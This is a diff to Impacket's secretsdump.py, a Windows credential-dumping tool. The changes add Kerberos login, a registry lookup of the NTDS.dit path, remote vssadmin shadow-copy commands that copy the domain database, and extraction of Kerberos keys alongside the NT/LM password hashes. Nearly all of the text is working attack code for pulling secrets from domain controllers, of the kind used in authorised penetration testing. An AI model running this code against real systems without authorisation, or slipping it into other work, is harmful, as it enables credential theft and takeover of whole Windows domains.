@@ -1,12 +1,10 @@
 #!/usr/bin/python
-# Copyright (c) 2003-2014 CORE Security Technologies
+# Copyright (c) 2003-2015 CORE Security Technologies
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# $Id: secretsdump.py 1154 2014-03-21 14:49:10Z bethus@gmail.com $
-#
 # Description: Performs various techniques to dump hashes from the
 #              remote machine without executing any agent there.
 #              For SAM and LSA Secrets (including cached creds)
@@ -22,7 +20,7 @@
 #              original state.
 #
 # Author:
-#  Alberto Solino
+#  Alberto Solino (@agsolino)
 #
 # References: Most of the work done by these guys. I just put all
 #             the pieces together, plus some extra magic.
@@ -40,12 +38,13 @@
 #
 from impacket import version, smbconnection, winregistry, ntlm
 from impacket.smbconnection import SMBConnection
-from impacket.dcerpc import dcerpc, transport, winreg
-from impacket.dcerpc.v5 import rpcrt, transport, rrp, scmr
+from impacket.dcerpc.v5 import rpcrt, transport, rrp, scmr, wkst, samr
 from impacket.winregistry import hexdump
 from impacket.structure import Structure
 from impacket.ese import ESENT_DB
+from impacket.examples import logger
 from struct import unpack, pack
+from collections import OrderedDict
 import sys
 import random
 import hashlib
@@ -62,8 +61,8 @@ try:
     from Crypto.Cipher import DES, ARC4, AES
     from Crypto.Hash import HMAC, MD4
 except Exception:
-    print "Warning: You don't have any crypto installed. You need PyCrypto"
-    print "See http://www.pycrypto.org/"
+    logging.critical("Warning: You don't have any crypto installed. You need PyCrypto")
+    logging.critical("See http://www.pycrypto.org/")
 
 
 # Structures
@@ -286,7 +285,20 @@ class RemoteOperations:
         self.__rrp.bind(rrp.MSRPC_UUID_RRP)
 
     def getMachineNameAndDomain(self):
-        return self.__smbConnection.getServerName(), self.__smbConnection.getServerDomain()
+        if self.__smbConnection.getServerName() == '':
+            # No serverName.. this is either because we're doing Kerberos
+            # or not receiving that data during the login process.
+            # Let's try getting it through RPC
+            rpc = transport.DCERPCTransportFactory(r'ncacn_np:445[\pipe\wkssvc]')
+            rpc.set_smb_connection(self.__smbConnection)
+            dce = rpc.get_dce_rpc()
+            dce.connect()
+            dce.bind(wkst.MSRPC_UUID_WKST)
+            resp = wkst.hNetrWkstaGetInfo(dce, 100)
+            dce.disconnect()
+            return resp['WkstaInfo']['WkstaInfo100']['wki100_computername'][:-1], resp['WkstaInfo']['WkstaInfo100']['wki100_langroup'][:-1]
+        else:
+            return self.__smbConnection.getServerName(), self.__smbConnection.getServerDomain()
 
     def getDefaultLoginAccount(self):
         try:
@@ -504,32 +516,53 @@ class RemoteOperations:
 
         lines = self.__answerTMP.split('\n')
         lastShadow = ''
+        lastShadowFor = ''
+
         # Let's find the last one
+        # The string used to search the shadow for drive. Wondering what happens
+        # in other languages
+        SHADOWFOR = 'Volume: ('
+
         for line in lines:
            if line.find('GLOBALROOT') > 0:
                lastShadow = line[line.find('\\\\?'):][:-1]
+           elif line.find(SHADOWFOR) > 0:
+               lastShadowFor = line[line.find(SHADOWFOR)+len(SHADOWFOR):][:2]
 
         self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
 
-        return lastShadow
+        return lastShadow, lastShadowFor
 
     def saveNTDS(self):
         logging.info('Searching for NTDS.dit')
-        # First of all, see if NTDS is at the target server
-        tid = self.__smbConnection.connectTree('ADMIN$')
+        # First of all, let's try to read the target NTDS.dit registry entry
+        ans = rrp.hOpenLocalMachine(self.__rrp)
+        regHandle = ans['phKey']
         try:
-            fid = self.__smbConnection.openFile(tid, 'NTDS\\ntds.dit')
-        except Exception, e:
-            if str(e).find('NOT_FOUND') > 0:
-               return None
+            ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
+            keyHandle = ans['phkResult']
+        except:
+            # Can't open the registry path, assuming no NTDS on the other end
+            return None
 
-        logging.info('NTDS.dit found. Calling vssadmin to get a copy. This might take some time')
+        try:
+            dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
+            ntdsLocation = dataValue[:-1]
+            ntdsDrive = ntdsLocation[:2]
+        except:
+            # Can't open the registry path, assuming no NTDS on the other end
+            return None
+
+        rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
+        rrp.hBaseRegCloseKey(self.__rrp, regHandle)
+        
+        logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % (ntdsLocation))
         # Get the list of remote shadows
-        shadow = self.__getLastVSS()
-        if shadow == '':
+        shadow, shadowFor = self.__getLastVSS()
+        if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
             # No shadow, create one
-            self.__executeRemote('%COMSPEC% /C vssadmin create shadow /For=%SYSTEMDRIVE%')
-            shadow = self.__getLastVSS()
+            self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
+            shadow, shadowFor = self.__getLastVSS()
             shouldRemove = True
             if shadow == '':
                 raise Exception('Could not get a VSS')
@@ -539,10 +572,10 @@ class RemoteOperations:
         # Now copy the ntds.dit to the temp directory
         tmpFileName = ''.join([random.choice(string.letters) for i in range(8)]) + '.tmp'
 
-        self.__executeRemote('%%COMSPEC%% /C copy %s\\Windows\\NTDS\\ntds.dit %%SYSTEMROOT%%\\Temp\\%s' % (shadow, tmpFileName))
+        self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))
       
         if shouldRemove is True:
-            self.__executeRemote('%COMSPEC% /C vssadmin delete shadows /For=%SYSTEMDRIVE% /Quiet')
+            self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)
 
         self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
 
@@ -661,7 +694,7 @@ class SAMHashes(OfflineRegistry):
         checkSum = self.MD5( self.__hashedBootKey[:16] + DIGITS + self.__hashedBootKey[:16] + QWERTY)
 
         if checkSum != self.__hashedBootKey[16:]:
-            raise Exception('hashedBootKey CheckSum failed!')
+            raise Exception('hashedBootKey CheckSum failed, Syskey startup password probably in use! :(')
 
     def __decryptHash(self, rid, cryptedHash, constant):
         # Section 2.2.11.1.1 Encrypting an NT or LM Hash Value with a Specified Key
@@ -787,6 +820,10 @@ class LSASecrets(OfflineRegistry):
     def __decryptSecret(self, key, value):
         # [MS-LSAD] Section 5.1.2
         plainText = ''
+
+        encryptedSecretSize = unpack('<I', value[:4])[0]
+        value = value[len(value)-encryptedSecretSize:]
+
         key0 = key
         for i in range(0, len(value), 8):
             cipherText = value[:8]
@@ -856,7 +893,7 @@ class LSASecrets(OfflineRegistry):
             tmpKey = self.__sha256(self.__LSAKey, record['EncryptedData'][:32])
             self.__NKLMKey = self.__decryptAES(tmpKey, record['EncryptedData'][32:])
         else:
-            self.__NKLMKey = self.__decryptSecret(self.__LSAKey,value[1][0xc:])
+            self.__NKLMKey = self.__decryptSecret(self.__LSAKey, value[1])
 
     def __pad(self, data):
         if (data & 0x3) > 0:
@@ -942,7 +979,7 @@ class LSASecrets(OfflineRegistry):
                         secret =  "%s:" % account
                 else:
                     # We don't support getting this info for local targets at the moment
-                    secret = '(Unknown User):',
+                    secret = '(Unknown User):'
                 secret += strDecoded       
         elif upperName.startswith('DEFAULTPASSWORD'):
             # defaults password for winlogon
@@ -1021,7 +1058,7 @@ class LSASecrets(OfflineRegistry):
                     record = LSA_SECRET_BLOB(plainText)
                     secret = record['Secret']
                 else:
-                    secret = self.__decryptSecret(self.__LSAKey,value[1][0xc:])
+                    secret = self.__decryptSecret(self.__LSAKey, value[1])
 
                 self.__printSecret(key, secret)
         
@@ -1060,6 +1097,15 @@ class NTDSHashes():
         'ntPwdHistory':'ATTk589918',
         'lmPwdHistory':'ATTk589984',
         'pekList':'ATTk590689',
+        'supplementalCredentials':'ATTk589949',
+    }
+
+    KERBEROS_TYPE = {
+        1:'dec-cbc-crc',
+        3:'des-cbc-md5',
+        17:'aes128-cts-hmac-sha1-96',
+        18:'aes256-cts-hmac-sha1-96',
+        0xffffff74:'rc4_hmac',
     }
 
     INTERNAL_TO_NAME = dict((v,k) for k,v in NAME_TO_INTERNAL.iteritems())
@@ -1091,6 +1137,13 @@ class NTDSHashes():
             ('EncryptedHash',':'),
         )
 
+    class CRYPTED_BLOB(Structure):
+        structure = (
+            ('Header','8s=""'),
+            ('KeyMaterial','16s=""'),
+            ('EncryptedHash',':'),
+        )
+
     def __init__(self, ntdsFile, bootKey, isRemote = False, history = False, noLMHash = True):
         self.__bootKey = bootKey
         self.__NTDS = ntdsFile
@@ -1102,7 +1155,8 @@ class NTDSHashes():
         self.__tmpUsers = list()
         self.__PEK = None
         self.__cryptoCommon = CryptoCommon()
-        self.__itemsFound = {}
+        self.__hashesFound = {}
+        self.__kerberosKeys = OrderedDict()
 
     def __getPek(self):
         logging.info('Searching for pekList, be patient')
@@ -1150,6 +1204,46 @@ class NTDSHashes():
 
         return decryptedHash
 
+    def __decryptSupplementalInfo(self, record):
+        # This is based on [MS-SAMR] 2.2.10 Supplemental Credentials Structures
+        if record[self.NAME_TO_INTERNAL['supplementalCredentials']] is not None:
+            if len(record[self.NAME_TO_INTERNAL['supplementalCredentials']].decode('hex')) > 24:
+                if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
+                    domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
+                    userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
+                else: 
+                    userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
+                cipherText = self.CRYPTED_BLOB(record[self.NAME_TO_INTERNAL['supplementalCredentials']].decode('hex'))
+                plainText = self.__removeRC4Layer(cipherText)
+                try:
+                    userProperties = samr.USER_PROPERTIES(plainText)
+                except:
+                    # On some old w2k3 there might be user properties that don't 
+                    # match [MS-SAMR] structure, discarding them
+                    return
+                propertiesData = userProperties['UserProperties']
+                for propertyCount in range(userProperties['PropertyCount']):
+                    userProperty = samr.USER_PROPERTY(propertiesData)   
+                    propertiesData = propertiesData[len(userProperty):]
+                    # For now, we will only process Newer Kerberos Keys. 
+                    if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':
+                        propertyValueBuffer = userProperty['PropertyValue'].decode('hex')
+                        kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)
+                        data = kerbStoredCredentialNew['Buffer']
+                        for credential in range(kerbStoredCredentialNew['CredentialCount']):
+                            keyDataNew = samr.KERB_KEY_DATA_NEW(data)
+                            data = data[len(keyDataNew):]
+                            keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]
+    
+                            if  self.KERBEROS_TYPE.has_key(keyDataNew['KeyType']):
+                                answer =  "%s:%s:%s" % (userName, self.KERBEROS_TYPE[keyDataNew['KeyType']],keyValue.encode('hex'))
+                            else:
+                                answer =  "%s:%s:%s" % (userName, hex(keyDataNew['KeyType']),keyValue.encode('hex'))
+                            # We're just storing the keys, not printing them, to make the output more readable
+                            # This is kind of ugly... but it's what I came up with tonight to get an ordered
+                            # set :P. Better ideas welcomed ;)
+                            self.__kerberosKeys[answer] = None
+
     def __decryptHash(self, record):
         logging.debug('Decrypting hash for user: %s' % record[self.NAME_TO_INTERNAL['name']])
         
@@ -1179,7 +1273,7 @@ class NTDSHashes():
             userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
  
         answer =  "%s:%s:%s:%s:::" % (userName, rid, LMHash.encode('hex'), NTHash.encode('hex'))
-        self.__itemsFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')] = answer
+        self.__hashesFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')] = answer
         print answer
       
         if self.__history:
@@ -1208,7 +1302,7 @@ class NTDSHashes():
                     lmhash = LMHash.encode('hex')
             
                 answer =  "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash, NTHash.encode('hex'))
-                self.__itemsFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')+str(i)] = answer
+                self.__hashesFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')+str(i)] = answer
                 print answer
         
 
@@ -1226,7 +1320,21 @@ class NTDSHashes():
             logging.info('Reading and decrypting hashes from %s ' % self.__NTDS)
             # First of all, if we have users already cached, let's decrypt their hashes
             for record in self.__tmpUsers:
-                self.__decryptHash(record)
+                try:
+                    self.__decryptHash(record)
+                    self.__decryptSupplementalInfo(record)
+                except Exception, e:
+                    #import traceback
+                    #print traceback.print_exc()
+                    try:
+                        logging.error("Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
+                        logging.error(str(e))
+                        pass
+                    except: 
+                        logging.error("Error while processing row!")
+                        logging.error(str(e))
+                        pass
+
             # Now let's keep moving through the NTDS file and decrypting what we find
             while True:
                 try:
@@ -1240,25 +1348,31 @@ class NTDSHashes():
                 try:
                     if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES: 
                         self.__decryptHash(record)
+                        self.__decryptSupplementalInfo(record)
                 except Exception, e:
                     #import traceback
                     #print traceback.print_exc()
                     try:
                         logging.error("Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
                         logging.error(str(e))
+                        pass
                     except: 
                         logging.error("Error while processing row!")
                         logging.error(str(e))
                         pass
+        # Now we'll print the Kerberos keys. So we don't mix things up in the output. 
+        if len(self.__kerberosKeys) > 0:
+            logging.info('Kerberos keys from %s ' % self.__NTDS)
+            for itemKey in self.__kerberosKeys.keys():
+                print itemKey
          
-
     def export(self, fileName):
-        if len(self.__itemsFound) > 0:
-            items = sorted(self.__itemsFound)
+        if len(self.__hashesFound) > 0:
+            items = sorted(self.__hashesFound)
             fd = open(fileName+'.ntds','w+')
             for item in items:
                 try:
-                    fd.write(self.__itemsFound[item]+'\n')
+                    fd.write(self.__hashesFound[item]+'\n')
                 except Exception, e:
                     try:
                         logging.error("Error writing entry %d, skipping" % item)
@@ -1266,6 +1380,11 @@ class NTDSHashes():
                         logging.error("Error writing entry, skipping")
                     pass
             fd.close()
+        if len(self.__kerberosKeys) > 0:
+            fd = open(fileName+'.ntds.kerberos','w+')
+            for itemKey in self.__kerberosKeys.keys():
+                fd.write(itemKey+'\n')
+            fd.close()
 
     def finish(self):
         if self.__NTDS is not None:
@@ -1273,13 +1392,14 @@ class NTDSHashes():
 
 
 class DumpSecrets:
-    def __init__(self, address, username = '', password = '', domain='', hashes = None, system=False, security=False, sam=False, ntds=False, outputFileName = None, history=False):
+    def __init__(self, address, username = '', password = '', domain='', hashes = None, aesKey=None, doKerberos=False, system=False, security=False, sam=False, ntds=False, outputFileName = None, history=False):
         self.__remoteAddr = address
         self.__username = username
         self.__password = password
         self.__domain = domain
         self.__lmhash = ''
         self.__nthash = ''
+        self.__aesKey = aesKey
         self.__smbConnection = None
         self.__remoteOps = None
         self.__SAMHashes = None
@@ -1293,6 +1413,7 @@ class DumpSecrets:
         self.__noLMHash = True
         self.__isRemote = True
         self.__outputFileName = outputFileName
+        self.__doKerberos = doKerberos
 
         if hashes is not None:
             self.__lmhash, self.__nthash = hashes.split(':')
@@ -1300,7 +1421,10 @@ class DumpSecrets:
 
     def connect(self):
         self.__smbConnection = SMBConnection(self.__remoteAddr, self.__remoteAddr)
-        self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+        if self.__doKerberos:
+            self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
+        else:
+            self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
 
     def getBootKey(self):
         # Local Version whenever we are given the files directly
@@ -1426,9 +1550,9 @@ class DumpSecrets:
 if __name__ == '__main__':
     print version.BANNER
 
-    parser = argparse.ArgumentParser()
+    parser = argparse.ArgumentParser(add_help = True, description = "Performs various techniques to dump secrets from the remote machine without executing any agent there.")
 
-    parser.add_argument('target', action='store', help='[domain/][username[:password]@]<address> or LOCAL (if you want to parse local files)')
+    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files)')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
     parser.add_argument('-system', action='store', help='SYSTEM hive to parse')
     parser.add_argument('-security', action='store', help='SECURITY hive to parse')
@@ -1439,6 +1563,10 @@ if __name__ == '__main__':
     group = parser.add_argument_group('authentication')
 
     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
+    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
+    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
+    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+
     if len(sys.argv)==1:
         parser.print_help()
         sys.exit(1)
@@ -1462,11 +1590,14 @@ if __name__ == '__main__':
         if domain is None:
             domain = ''
     
-        if password == '' and username != '' and options.hashes is None:
+        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
             from getpass import getpass
             password = getpass("Password:")
 
-    dumper = DumpSecrets(address, username, password, domain, options.hashes, options.system, options.security, options.sam, options.ntds, options.outputfile, options.history)
+        if options.aesKey is not None:
+            options.k = True
+
+    dumper = DumpSecrets(address, username, password, domain, options.hashes, options.aesKey, options.k, options.system, options.security, options.sam, options.ntds, options.outputfile, options.history)
 
     try:
         dumper.dump()
